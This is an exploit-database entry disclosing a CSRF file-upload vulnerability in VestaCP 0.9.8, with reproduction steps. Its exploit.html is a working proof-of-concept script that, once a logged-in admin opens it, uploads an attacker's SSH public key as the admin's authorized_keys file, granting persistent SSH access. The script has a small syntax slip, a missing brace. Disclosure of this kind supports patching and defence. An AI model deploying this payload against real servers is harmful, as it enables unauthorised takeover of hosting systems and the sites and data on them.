Exploits / Vulnerability Discovered : 2021-03-17 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Vestacp 0.9.8 file upload csrf is for educational purposes only and if it is used you will do on your own risk!
## Description
I found that the checks performed by the upload functionality are insufficient, the upload functionality is vulnerable to CSRF, in addition it allows uploading files and creating folders under "/tmp" and under the home folder (usually "/home/admin"), the later is the one that is important for this exploit to work.
I was able to use this to create a ".ssh" folder in the admin home and upload "authorized_keys" file which allowed me to access the server later as "admin" using SSH.
Since this relies on a *CSRF* the admin has to visit a link, please note that *sshd* is already installed by *VestaCP* when using the default installation script so no need to install it, also please note that files can be replaced so even if the admin has already added "authorized_keys" file, it will be replaced with the attacker's file.
Affected endpoint: "/upload/index.php", i.e. "/upload/index.php?dir=/home/admin/.ssh/"
## Steps to reproduce.
1. Install the latest version of VestaCP in your machine by following the instructions at https://vestacp.com/install/.
2. Login as the admin in Firefox, then open "exploit.html".
3. ssh into the machine using 'ssh -i id_rsa admin@victimmachine', now you have access as admin.
# exploit.html
function exploit() {
var mystring = `ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCnXyu8AsFjbuE5YMUa74PrNkO9coGWnw59v/cSVMgOZVpx+UziT0BRFurhVkyujTCXdz6OlN4yFZjCVMbAgZ7/liNu9ecGSGNcUTC+Br5YawlG9QICEaJ/bK32+luKdM1c5ONbRby+ARFsC9+iZu6IkAPnSRntbNgDZpuej/cKfm85EnvdQPAijvs4+899w2+rGvhSQ0wH4l1KNlV1yVoAsg0PFYGDnbygGA5Eo4k9LHwa2Hsm5b2Q5GhqlEUCgYFOjScuORczwhctVtp4VWKXiFoMLJupNhot/OqUXkoNgE6UUd75XcLNGMBiyfLpfXO2u1sGsw5nTiKvNn+1YdC7AKHWBjxl3wDY8hMf/gcveV4Nh45mMUu0p6kptDdVhELeeys8euHiTWOk+FLCKkps9eLiyl8gQUfWcFVj0dgqYVJne2S1U33wnofRhj0fGWAJf14xHhwnTi7u58u+0U1NJchOTHAaeX1Swqk2J34Ny9GwD01a71DFIIcIbgcef6c= fady@fady-Lenovo-Legion-Y530-15ICH-1060`;
var fileContent = new Blob([mystring], {
type: 'text/plain'
myFormData = new FormData();
myFormData.append("files", fileContent, "authorized_keys");
fetch("https://localhost:8083/upload/index.php?dir=/home/admin/.ssh/", {
method: "post",
body: myFormData,
credentials: "include"
}); }